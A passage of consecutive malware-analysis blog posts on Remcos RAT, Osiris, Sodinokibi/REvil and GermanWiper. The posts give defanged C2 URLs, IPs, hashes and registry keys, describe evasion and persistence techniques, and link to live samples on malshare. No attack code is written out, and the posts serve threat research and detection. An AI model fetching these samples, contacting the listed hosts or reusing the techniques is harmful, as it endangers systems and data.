<h3>Contacted Servers</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">179</span><span class="p">.</span><span class="mi">12</span><span class="p">.</span><span class="mi">170</span><span class="p">[].]</span><span class="mi">88</span><span class="p">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">vermont</span><span class="o">/</span><span class="n">json</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">182</span><span class="p">.</span><span class="mi">76</span><span class="p">.</span><span class="mi">6</span><span class="p">[.]</span><span class="mi">2</span><span class="p">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">sess</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">86</span><span class="p">.</span><span class="mi">98</span><span class="p">.</span><span class="mi">25</span><span class="p">[.]</span><span class="mi">30</span><span class="p">:</span><span class="mi">53</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span><span class="n">attrib</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">198</span><span class="p">.</span><span class="mi">199</span><span class="p">.</span><span class="mi">88</span><span class="p">[.]</span><span class="mi">162</span><span class="p">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">sym</span><span class="o">/</span><span class="n">codec</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">178</span><span class="p">.</span><span class="mi">62</span><span class="p">.</span><span class="mi">37</span><span class="p">[.]</span><span class="mi">188</span><span class="p">:</span><span class="mi">443</span><span class="o">/</span><span class="n">health</span><span class="o">/</span><span class="n">enabled</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">92</span><span class="p">.</span><span class="mi">222</span><span class="p">.</span><span class="mi">125</span><span class="p">[.]</span><span class="mi">16</span><span class="p">:</span><span class="mi">7080</span><span class="o">/</span><span class="n">acquire</span><span class="o">/</span><span class="n">loadan</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">45</span><span class="p">.</span><span class="mi">79</span><span class="p">.</span><span class="mi">188</span><span class="p">.</span><span class="mi">67</span><span class="p">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">report</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">45</span><span class="p">.</span><span class="mi">79</span><span class="p">.</span><span class="mi">188</span><span class="p">.</span><span class="mi">67</span><span class="p">:</span><span class="mi">8080</span><span class="o">/</span><span class="n">stubs</span><span class="o">/</span><span class="k">schema</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">173</span><span class="p">.</span><span class="mi">214</span><span class="p">.</span><span class="mi">174</span><span class="p">[.]</span><span class="mi">107</span><span class="p">:</span><span class="mi">443</span><span class="o">/</span><span class="n">whoami</span><span class="p">.</span><span class="n">php</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">173</span><span class="p">.</span><span class="mi">214</span><span class="p">.</span><span class="mi">174</span><span class="p">[.]</span><span class="mi">107</span><span class="p">:</span><span class="mi">443</span><span class="o">/</span><span class="n">xian</span><span class="o">/</span><span class="n">vermont</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span><span class="n">merge</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="mi">173</span><span class="p">.</span><span class="mi">214</span><span class="p">.</span><span class="mi">174</span><span class="p">[.]</span><span class="mi">107</span><span class="p">:</span><span class="mi">443</span><span class="o">/</span><span class="n">symbols</span><span class="o">/</span><span class="n">enable</span><span class="o">/</span><span class="n">ringin</span><span class="o">/</span>
</pre></div>
<p></br></p>Malicious RATatouille π2019-09-07T00:00:00+02:002019-09-07T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-09-07:/malicious-ratatouille.html<p>Remcos is a commercially sold Remote Adiministration Toolkit (RAT) that is regularly distributed as Spyware</p><p>Depending on the licensing model and capabilities Remcos is sold for 58$ to 389$ by the company (with the pretty fitting name) Breaking Security. Feature-wise the manfacturer's website lists: Remote Administration, Support, Surveillance, Anti-Theft and Proxy. In most cases the executable is dropped via a boobytrapped Office or XML Document. Of course I will not link to any of their webpages or products since shilling out for cybercriminals would be the last thing I'd do. </p>
<p></br></p>
<p><img alt="Title Picture" src="https://dissectingmalwa.re/img/remcos-title.png"></p>
<p></br></p>
<p>Inspiration for this blog post came from @wwp96 on Twitter:</p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/remcos?src=hash&ref_src=twsrc%5Etfw">#remcos</a><br><br>jkharding2014.myddns[.]rocks<br>tomharry.ddns[.]net<br><br>2c8b1cca4ee54428dffc203b76c4dc30 - Dhl protected.iso<br>06469856a9bdecae989b64daf9db09c7 - carved exe<a href="https://t.co/YtsJYbhle9">https://t.co/YtsJYbhle9</a></p>— wwp96 (@wwp96) <a href="https://twitter.com/wwp96/status/1170332469960331266?ref_src=twsrc%5Etfw">September 7, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p></br></p>
<p>Remcos uses a Control instance (the C&C) and the so-called Agent (the executable that is delivered to the victim). It was first spotted in 2016 when it was being sold on HackForums. Since then it was being used in targeted attacks (mostly spear-phishing) against turkish government/military contractors or other businesses/individuals in the European Union. The Agent is written in C++ (while the Control application is written in Borland Delphi) and is 110KB in size. Click here for the <a href="https://app.any.run/tasks/8c9c6779-0f98-4ab4-b28c-1154f7b489eb/">AnyRun Analysis</a>.</p>
<p></br></p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/remcos-reg1.png"></center></p>
<p></br></p>
<p>Of course it fiddles around in the registry as well. It uses the Key in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run to bind to the system startup.</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/remcos-die.png"></center></p>
<p>Although there are versions of Remcos that are packed with UPX and MPRESS1 this sample is not obfuscated in any way.</p>
<p></br></p>
<p><center><img alt="DNS Queries" src="https://dissectingmalwa.re/img/remcos-dns.png"></center></p>
<p></br></p>
<p>In terms of network interactions it queries two Dynamic DNS URLs that both point to the same host at <em>66.154.113[.]142</em></p>
<p></br></p>
<p><center><img alt="Remcos Version" src="https://dissectingmalwa.re/img/remcos-version.png"></center></p>
<p></br></p>
<p>With Version 1.7 Pro we've got an old Version of the RAT in our hands which dates back to 5th of January 2017. The most recent version of the malware according to the changelog is V2.4.7. Another thing one usually doesn't get with malware: a 31-page manual. It goes over the features and configuation points the malware has to offer and even includes a "Terms of Service" chapter which states that <em>users have to be notified that there is surveillance software in place</em> and that <em>the use of remcos for illegal activities</em> is forbidden. As if they would care that their software was probably used in >95% of malicious acts. Judging by the typos and a few screenshots I'd attribute this malware to eastern european threat-actors.</p>
<p></br></p>
<p><center><img alt="Remcos Manual" src="https://dissectingmalwa.re/img/remcos-manual.png"></center></p>
<p></br></p>
<p>The following Screenshots were captured after decompiling the executable with the retargetable Decompiler <a href="https://retdec.com/">retdec</a> by Avast. The decompiled result can be found <a href="https://dissectingmalwa.re/other/remcos.c">here</a>.</p>
<p></br></p>
<p><center><img alt="Remcos Install" src="https://dissectingmalwa.re/img/remcos-install.png"></center></p>
<p></br></p>
<p>As a first step it runs its dropped install script called <em>install.bat</em> and uses a ping to localhost to stall the process and make sure it is finished before proceding.</p>
<p></br></p>
<p><center><img alt="Remcos VBox Detection" src="https://dissectingmalwa.re/img/remcos-virtualbox.png"></center></p>
<p><center><img alt="Remcos Sandboxie Detection" src="https://dissectingmalwa.re/img/remcos-sandboxie.png"></center></p>
<p></br></p>
<p>In terms of Evasion techniques Remcos turns up with detection methods for both Virtualbox and Sandboxie.The above example shows the method it employs for Virtualbox via a registry key that is set if the Guest Additions are in place on the guest system. In the same manner it tries to call <em>SbieDll.dll</em> to check if Sandboxie is present.</p>
<p></br></p>
<p><center><img alt="Remcos C2" src="https://dissectingmalwa.re/img/remcos-c2.png"></center></p>
<p></br></p>
<p>The Remcos Agent also has debugging functionality via a console window, for example for the communication with the C&C Server.</p>
<p></br></p>
<p><center><img alt="Remcos Mutex" src="https://dissectingmalwa.re/img/remcos-mutex.png"></center></p>
<p></br></p>
<p>Remcos also employs Process Injection via a static Mutex. This behaviour is often used as a simple way of achieving persistence and to decrease the risk of a possible detection. Most versions of the RAT seem to inject into <em>svchost.exe</em>.</p>
<p></br></p>
<p><center><img alt="Remcos Options" src="https://dissectingmalwa.re/img/remcos-options.png"></center></p>
<p></br></p>
<p>Via the command & control structure we also get a pretty good look at all the features the malware supports. In this screenshot we can see the file operations, process manipulations and window interactions it has to offer to the operator. </p>
<p></br></p>
<p><center><img alt="Remcos Firefox" src="https://dissectingmalwa.re/img/remcos-firefox.png"></center></p>
<p></br></p>
<p>Another "standard" feature for RATs is accessing Browser History, cache and password stores. In this case Remcos is trying to manipulate user data in Mozilla Firefox.</p>
<p></br></p>
<p><center><img alt="Remcos Camera" src="https://dissectingmalwa.re/img/remcos-camera.png"></center></p>
<p></br></p>
<p>We also get a Look at the webcam capture module of the RAT which seems to support different camera modes. Additionally it also supports audio capture via a built-in microphone. </p>
<p></br></p>
<p><center><img alt="Remcos Shutdown" src="https://dissectingmalwa.re/img/remcos-shutdown.png"></center></p>
<p></br></p>
<p>Lastly the malware also has the capabilities to manipulte the system power state depending on the current priviledges. </p>
<p>Although Remcos is not a "new" malware by today's definition it is still a serious threat to look out for. In my test it scores <em>53/68</em> on <a href="https://www.virustotal.com/gui/file/1c3a298dd32da9de457842613dd4f07e0e57131a94bc13d868ffcbbebfab6d63/detection">VirusTotal</a>.</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Remcos RAT (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">1</span><span class="n">c3a298dd32da9de457842613dd4f07e0e57131a94bc13d868ffcbbebfab6d63</span>
<span class="mi">11535</span><span class="n">ea0ba3bf9ed0691b850955ef2613475dfdce7d8a32fa3d2d7ae066de73d</span>
</pre></div>
<h3>C&C URLs</h3>
<div class="highlight"><pre><span></span><span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">tomharry</span><span class="p">.</span><span class="n">ddns</span><span class="p">[.]</span><span class="n">net</span>
<span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">jkharding2014</span><span class="p">.</span><span class="n">myddns</span><span class="p">[.]</span><span class="n">rocks</span>
<span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">gratefulheart</span><span class="p">.</span><span class="n">ddns</span><span class="p">[.]</span><span class="n">net</span>
<span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">uaeoffice999</span><span class="p">.</span><span class="n">warzonedns</span><span class="p">[.]</span><span class="n">com</span>
</pre></div>
<h3>IPs</h3>
<div class="highlight"><pre><span></span><span class="mi">66</span><span class="p">.</span><span class="mi">154</span><span class="p">.</span><span class="mi">113</span><span class="p">[.]</span><span class="mi">142</span>
<span class="mi">79</span><span class="p">.</span><span class="mi">134</span><span class="p">.</span><span class="mi">225</span><span class="p">[.]</span><span class="mi">77</span>
<span class="mi">79</span><span class="p">.</span><span class="mi">134</span><span class="p">.</span><span class="mi">225</span><span class="p">[.]</span><span class="mi">81</span>
</pre></div>
<h3>Modified Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Run</span>
<span class="n">remcos</span> <span class="c1">--> "C:\Users\admin\AppData\Roaming\remcos\remcos.exe" </span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Internet</span> <span class="n">Settings</span><span class="err">\</span><span class="n">ZoneMap</span>
<span class="n">UNCAsIntranet</span> <span class="c1">--> 0</span>
<span class="n">AutoDetect</span> <span class="c1">--> 1</span>
</pre></div>
<p></br></p>Osiris, the god of afterlife...and banking malware?!2019-08-29T00:00:00+02:002019-08-29T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-08-29:/osiris-the-god-of-afterlifeand-banking-malware.html<p>After coming back from the Chaos Communication Camp two days ago I thought it would be a good idea to check on the current malware events out there, so come along for the ride</p><p>I came across this sample after this tweet by @James_inthe_box :</p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Found by <a href="https://twitter.com/FewAtoms?ref_src=twsrc%5Etfw">@FewAtoms</a> at:<br>borel[.]fr/notices/CanadaPost.zip -> vbs drops:<br>https://naot[.]org/cms/file/fixed111.exe<br><br>I'd like to say with confidence: I have no idea what this is. <a href="https://t.co/z18z17Kau8">https://t.co/z18z17Kau8</a> <a href="https://t.co/68zg3HpkRI">pic.twitter.com/68zg3HpkRI</a></p>— James (@James_inthe_box) <a href="https://twitter.com/James_inthe_box/status/1166733718423138304?ref_src=twsrc%5Etfw">August 28, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p></br></p>
<p><center><img alt="Properties of the Executable" src="https://dissectingmalwa.re/img/osiris-fileprop.png"></center>
</br></p>
<h4><em>A short disclaimer: downloading and running the samples linked below will compromise your computer and data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<h3>Get your sample today from:</h3>
<p>Osiris available @ <a href="https://malshare.com/sample.php?action=detail&hash=9f4d8bd1cba2681f3bcf642f56342ac7">https://malshare.com/sample.php?action=detail&hash=9f4d8bd1cba2681f3bcf642f56342ac7</a>
<code>sha256 0325714eeb2af235a0f543ad9e11b5d852a61be78c9ece308c651412d97edd39</code>
</br>
</br>
<center><img alt="Dropped files in %APPDATA%\Roaming" src="https://dissectingmalwa.re/img/osiris-roaming.png"></center>
</br>
<center><p>Files dropped in %APPDATA%\Roaming</p></center>
</br>
</br>
<center><img alt="Dropped files in %APPDATA%\Local\Temp" src="https://dissectingmalwa.re/img/osiris-temp.png"></center>
</br>
<center><p>Files dropped in %temp%</p></center>
</br>
</br>
<center><img alt="Binding for System Startup" src="https://dissectingmalwa.re/img/osiris-startup.png"></center>
</br>
</br>
After running the sample for the first time it adds itself to system startup and copies itself to <em>%appdata%\Roaming\Microsoft\Windows\Protected\setspn.exe</em>. Comparing the malicious setspn.exe with the Microsoft Original (which is normally found at C:\Windows\System32\setspn.exe) with the help of PEBear it is obvious that the files are not the same.</p>
<p><center><img alt="Dropped files in %APPDATA%\Roaming" src="https://dissectingmalwa.re/img/osiris-setspn.png"></center></p>
<p>To jump straight to the <em>Hybrid-Analysis</em> report for fixed111.exe click <a href="https://www.hybrid-analysis.com/sample/0325714eeb2af235a0f543ad9e11b5d852a61be78c9ece308c651412d97edd39/5d6677f3038838a982e5752c">here</a>. I picked out a couple of interesting findings for you:
</br>
</br>
<center><img alt="Hybrid-Analysis IR" src="https://dissectingmalwa.re/img/osiris-ha.png"></center>
</br>
</br>
</br>
One thing that stands out is that Osiris uses components of the Nullsoft Scriptable Installer. I did not look into it that far yet, but it seems like it is used for a headless install only.
</br>
</br>
<center><img alt="Hybrid-Analysis Mini-Tor" src="https://dissectingmalwa.re/img/osiris-minitor.png"></center>
</br>
A quite interesting find: this Osiris sample uses a POC implementation called <a href="https://github.com/wbenny/mini-tor">Mini-Tor</a> for communication with the Tor network. Pretty convenient for the malware author as it keeps the size of the binary small, but still allows data exfiltration over an anonymized protocol.</p>
<p>Click here for the <a href="https://app.any.run/tasks/99d3a922-0bec-4680-a65f-376302315311/">Any.Run</a> analysis.
</br>
<center><img alt="AnyRun HTTP Requests" src="https://dissectingmalwa.re/img/osiris-http.png"></center>
</br></p>
<p>As the <a href="https://twitter.com/James_inthe_box/status/1166733718423138304">Twitter Discussion</a> about this sample started multiple theories about the Tor Requests were brought up. My explaination for this behaviour is that the malware is exfiltrating data over the Tor network. Because of the URL format of the requested sites <em>IPAddress/tor/servers/fp/-HASH-</em> one can assume that the contacted servers are <em>Directory Servers</em> which hold the <a href="https://stem.torproject.org/api/descriptor/server_descriptor.html">Server Descriptor</a> Files for known Nodes. This is why I'd classify this behaviour as more or less standard client communication.</p>
<p></br>
<center><img alt="AnyRun Threats" src="https://dissectingmalwa.re/img/osiris-threats.png"></center>
</br>
</br></p>
<h2><em>IOCs</em></h2>
<h3>Files</h3>
<div class="highlight"><pre><span></span><span class="n">fixed111</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--SHA1--> a1887f8b29ef20a6e0d7284521c40eee77d47dd0</span>
<span class="n">setspn</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--SHA1--> a1887f8b29ef20a6e0d7284521c40eee77d47dd0</span>
<span class="n">GetX64BTIT</span><span class="p">.</span><span class="n">exe</span><span class="c1">--SHA1--> 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0</span>
<span class="n">Majorca</span><span class="p">.</span><span class="n">dll</span> <span class="c1">--SHA1--> 47d9371a0dd3369d89068994d5d18bb54a0d7433</span>
<span class="k">System</span><span class="p">.</span><span class="n">dll</span> <span class="c1">--SHA1--> 48df0911f0484cbe2a8cdd5362140b63c41ee457</span>
<span class="n">gutils</span><span class="p">.</span><span class="n">dll</span> <span class="c1">--SHA1--> ab92a9a74c55c5e5d05f1f3dde518371dda76548</span>
<span class="n">resToResX</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--SHA1--> b5114de8c2e78d72ec8ddb6ab7bcb02b1bb5291f</span>
<span class="mi">79</span><span class="p">.</span><span class="n">opends60</span><span class="p">.</span><span class="n">dll</span> <span class="c1">--SHA1--> ec9946684d5e72dbc5bdcffa31167ad1a19e29bd</span>
<span class="n">MicrosoftXslDebugProxy</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--SHA1--> 2d9b200ea1d9fb6442f21bb5441072bd4b9d1968</span>
<span class="n">UserInfo</span><span class="p">.</span><span class="n">dll</span> <span class="c1">--SHA1--> 0bd28183a9d8dbb98afbcf100fb1f4f6c5fc6c41</span>
<span class="n">TypeSharingService2</span><span class="p">.</span><span class="n">asmx</span> <span class="c1">--SHA1--> f28868e733bfdcf68cee93509f84694df50bbdf4</span>
<span class="n">libfontconfig1amd64</span><span class="p">.</span><span class="n">triggers</span> <span class="c1">--SHA1--> 6ca8f520c10214648f88a8ba08ccdfcc53b124a3</span>
<span class="mi">349</span><span class="n">f9714</span><span class="p">.</span><span class="n">lnk</span> <span class="c1">--SHA1--> fe08da4fd09dbab64d4e4d23b9a935468ef05f8b</span>
<span class="mi">703</span> <span class="c1">--SHA1--> bb5d6f6ba8155899d0017ce2edc1bf2622ad5b3b</span>
<span class="n">x</span><span class="o">-</span><span class="n">perl</span><span class="p">.</span><span class="n">xml</span> <span class="c1">--SHA1--> 32404eab9098db64af17b6e5862b0b563f57c2dd</span>
<span class="n">x64btit</span><span class="p">.</span><span class="n">txt</span> <span class="c1">--SHA1--> cd8fff32832f8a8f20b88a2f32c04800535d060e</span>
<span class="n">Paragraphia</span> <span class="c1">--SHA1--> 360071bee9bae26834006615d0fb711d25f4a4af</span>
<span class="n">_dvvsdebugapi</span> <span class="c1">--SHA1--> f5db6c9fed4cb80461502bb6d25532e8f0c1f064</span>
<span class="n">win</span><span class="p">.</span><span class="n">ini</span> <span class="c1">--SHA1--> f939c7deb74637544a09df6d0a096f5719b227d1</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">httpx</span><span class="p">:</span><span class="o">//</span><span class="n">naot</span><span class="p">[.]</span><span class="n">org</span><span class="o">/</span><span class="n">cms</span><span class="o">/</span><span class="n">file</span><span class="o">/</span><span class="n">fixed111</span><span class="p">.</span><span class="n">exe</span>
<span class="n">httpx</span><span class="p">:</span><span class="o">//</span><span class="n">borel</span><span class="p">[.]</span><span class="n">fr</span><span class="o">/</span><span class="n">notices</span><span class="o">/</span><span class="n">CanadaPost</span><span class="p">.</span><span class="n">zip</span>
</pre></div>GermanWiper's big Brother? GandGrab's kid ? Sodinokibi!2019-08-10T00:00:00+02:002019-08-10T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-08-10:/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html<p>After last week's analysis on GermanWiper I thought it would be about time to have a Look at Sodinokibi aka REvil, the new weird kid on the block.</p><p></br>
<img alt="Background" src="https://dissectingmalwa.re/img/sodi-bg.png">
</br>
</br></p>
<p>According to <a href="https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack">Cybereason</a> the Sodinokibi Ransomware was written by the same guys who created GandCrab, which is a pretty big deal after GandCrab retired recently. The samples that I'll be looking at today were first dropped in Asia, but it did not take long to reach other continents as well.</p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<h3>Where I dug up the samples this time:</h3>
<p>Sodinokibi #1 available @ <a href="https://malshare.com/sample.php?action=detail&hash=6cb6fda0b353d411a30c5b945e53ea52">https://malshare.com/sample.php?action=detail&hash=6cb6fda0b353d411a30c5b945e53ea52</a>
<code>sha256 bace25c1ec587d099b4c566b1a07978dd9cb3bd67c2acaa55d2e4644a7877070</code></p>
<p>Sodinokibi #2 available @ <a href="https://malshare.com/sample.php?action=detail&hash=7354af1a63f222ede4c9e0a6f84d57c2">https://malshare.com/sample.php?action=detail&hash=7354af1a63f222ede4c9e0a6f84d57c2</a>
<code>sha256 2fea45f7be7c7313ee6e4fe7ad9ef64d9966a2391003a00dcbbd6214e9c522ef</code></p>
<p><img alt="Running Sodinokibi" src="https://dissectingmalwa.re/img/sodi-run.png"></p>
<p>Running it through VirusTotal we get a pretty good detection rate, but that is to be expected since REvil is around for a few days already. Here's a direct Link to the <a href="https://www.virustotal.com/gui/file/bace25c1ec587d099b4c566b1a07978dd9cb3bd67c2acaa55d2e4644a7877070/detection">VT Analysis</a>.
</br>
</br>
</br>
<img alt="VT Analysis" src="https://dissectingmalwa.re/img/sodi-vt.png">
</br>
</br>
</br>
Looking at Detect it easy we don't see anything special either. The PE seems to be built with MS Visual Studio 2015 (Linker Version 14).
<center><img alt="Detect it easy - Info" src="https://dissectingmalwa.re/img/sodi-die.png"></center></p>
<p>Entropy-wise we can observe a huge drop near the end of the binary.
<center><img alt="Detect it easy - Entropy" src="https://dissectingmalwa.re/img/sodi-entropy.png"></center></p>
<p><img alt="Running Sodinokibi" src="https://dissectingmalwa.re/img/sodi-bear-FileHeader.png">
</br>
</br>
</br>
The imports definitely indicate that somethings is wrong here. Only loading kernel32.dll with 3 entries is a bit minimalistic for ransomware.
</br>
</br>
</br>
<img alt="Running Sodinokibi" src="https://dissectingmalwa.re/img/sodi-bear-Imports.png">
</br>
</br>
</br>
For one to get his/her Hands on the actual PE with an intact/complete IAT there are a couple of possible ways. Sergei Frankoff explained a very fast, but slightly "messy" Method on OALive. I'll try to replay this technique and plan to come back to this sample soon to try and script my way out of this hole.
</br>
</br>
<center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/0raUaL4TIo4" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
</br>
</br>
</br>
<center><img alt="Loading REvil into x32dbg" src="https://dissectingmalwa.re/img/sodi-x32dbg.png"></center></p>
<p>A dump of the strings in the binary file can be found <a href="https://dissectingmalwa.re/other/sodi-strings.txt">here</a>. Likewise a sample of the ransomnote dropped as a textfile by the malware is available <a href="https://dissectingmalwa.re/other/sodi-note.txt">here</a>.
</br>
</br></p>
<h2>The Decryptor</h2>
<p></br>
Thanks to a businessman who shall remain nameless but decided to pay the ransom we can take a look at the Decryptor V1.3 as well. My feeling about this executable is, that it is being built to order rather than prepared in case a decryption is requested. The tool feels relatively unpolished because of the active debugging, no obfuscation or anti-evasion.
</br>
</br>
<center><img alt="The GUI of the Decryptor" src="https://dissectingmalwa.re/img/sodidec-gui.png"></center></p>
<p></br></p>
<p><center><img alt="The Debug Console of the Decryptor" src="https://dissectingmalwa.re/img/sodidec-cons.png"></center></p>
<p></br>
Running it through Detect it Easy there is nothing spectacular going on here. Consistent with the ransomware itself the decryptor was built with Visual Studio 2015 as well. Entropy-wise there are no surprises either at <em>4.64889</em>. </p>
<p><img alt="Running Sodinokibi" src="https://dissectingmalwa.re/img/sodidec-die.png"></p>
<p>OL4/y7znO6S6W7qPdbyz7S1iWvOlwRAz6y4Y0qL0+1g=
31869wv07x</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Sodinokibi / REvil Ransomware (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="n">bace25c1ec587d099b4c566b1a07978dd9cb3bd67c2acaa55d2e4644a7877070</span>
<span class="mi">2</span><span class="n">fea45f7be7c7313ee6e4fe7ad9ef64d9966a2391003a00dcbbd6214e9c522ef</span>
<span class="n">ada9794bcc8e87af05f9982522e26f7ead3d1cb07bb76ce58fac1bf98e41cf53</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">decryptor</span><span class="p">[.]</span><span class="n">top</span>
<span class="n">httx</span><span class="p">:</span><span class="o">//</span><span class="n">aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd</span><span class="p">.</span><span class="n">onion</span>
</pre></div>
<p></br></p>TFW Ransomware is only your side hustle...2019-07-31T00:00:00+02:002019-07-31T00:00:00+02:00f0wLtag:dissectingmalwa.re,2019-07-31:/tfw-ransomware-is-only-your-side-hustle.html<p>and you constantly have to apply for jobs. A partial analysis of the "GermanWiper" Ransomware</p><p>Today someone posted about a Ransomware attack on the local chat plaform <a href="https://jodel.com/">Jodel</a> (don't judge please, as you know the sketchy corners of the web get you the best samples :D) which instantly peaked my interest. What I got was this email and the two attached files.
</br>
</br>
</br>
<img alt="Screenshot of the E-Mail" src="https://dissectingmalwa.re/img/jodel-email.png">
</br>
</br>
</br></p>
<p>The two attached files <em>Applicant Name - Lebenslauf Aktuell.doc.lnk</em> and <em>Applicant Name - Arbeitszeugnisse Aktuell.doc.lnk</em> are made to look like Microsoft Office Documents but are actually just Windows File Shortcuts and can easily be parsed with the <a href="https://code.google.com/archive/p/lnk-parser/">LNK Parser @ Google Code</a>. The output looks like this:
</br>
</br>
</br></p>
<p><img alt="Parsed file" src="https://dissectingmalwa.re/img/jodel-link.png">
</br>
</br>
</br>
The person who provided me with this data was kind enough to also include the ransom note, which is, unlike most ransomware strains out there in the wild wild cyber west, not a txt File but rather a HTML file. It includes links to bitcoin exchanges, a hardcoded wallet address and asks for 0.15038835 BTC as a ransom. Just like the E-Mail it is written in spotless german but without Umlauts (Γ€,ΓΆ,ΓΌ). A cleaned sample can be found <a href="https://dissectingmalwa.re/other/clean.html">here</a>
</br>
</br>
Communication with the attacker's server at <em>173.33.106.120</em> (hosted at OVH) is done via a php script at the bottom of the ransom note. Since the server was not reachable at the time of analysis I could not take a closer look at neither the script nor the dropped <em>.hta</em> file that is run via the powershell command in the .lnks.
</br>
</br>
</br>
<img alt="Parsed file" src="https://dissectingmalwa.re/img/jodel-url.png">
</br>
</br>
</br>
The most worrying thing about this sample is the "encryption" though. Every file touched by <em>GermanWiper</em> is overwritten with zeros. A list of file extensions used by the wiper can be found on <a href="https://pastebin.com/rUGpEBfD">pastebin</a>. Because of this behaviour the malware was dubbed "GermanWiper" by Michael Gillespie (<a href="https://twitter.com/demonslay335">@Demonslay335</a>). The BleepingComputer Forum post discussing this strain can be found <a href="https://www.bleepingcomputer.com/forums/t/701735/germanwiper-ransomware-with-random-extensions-08kja-avco3-oqn1b/">here</a>.
</br>
</br>
</br>
<center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/jodel-zeros.png"></center>
</br>
</br>
A not-so-Happy Ending: <em>Encrypted files will not be recoverable</em> and if you are a victim please spend your money somewhere else and <em>not on the ransom</em>.
</br>
</br></p>
<h2>Update: A look at the dropped executable</h2>
<p>GermanWiper available @ <a href="https://malshare.com/sample.php?action=detail&hash=36ccd442755d482900b57188ae3a89a7">https://malshare.com/sample.php?action=detail&hash=36ccd442755d482900b57188ae3a89a7</a>
</br>
<em>sha256 41364427dee49bf544dcff61a6899b3b7e59852435e4107931e294079a42de7c</em></p>
<p><img alt="Running germanWiper" src="https://dissectingmalwa.re/img/germanWiper-run.png"></p>
<p>As a first step I like to run my samples through "Detect it easy" to get a first look at what to expect. Not a huge discovery, but it interesting none the less that the executable was likely compiled with Visual Studio 2010. </p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/germanWiper-die.png"></center></p>
<p>Let's check the entropy of the sample to see if it is packed. Heavy obfuscation is a rare sight for ransomware, but running your executable through a packer or crypter of some sort might avoid detection through already existing signatures and ransom campaigns often ship more than one version of their executable.</p>
<p><center><img alt="Zeroed File" src="https://dissectingmalwa.re/img/germanWiper-entropy.png"></center></p>
<p>A quick test to see how much effort the attackers have put into it is to try to unpack it with upx, but no such luck in this case:
</br>
</br>
<img alt="UPX" src="https://dissectingmalwa.re/img/germanWiper-upx.png">
</br>
</br>
</br>
I'm not quite sure why, but the attackers set an Amazon Logo as a file icon for the malware. Maybe to lure the victim into clicking on it ?
</br>
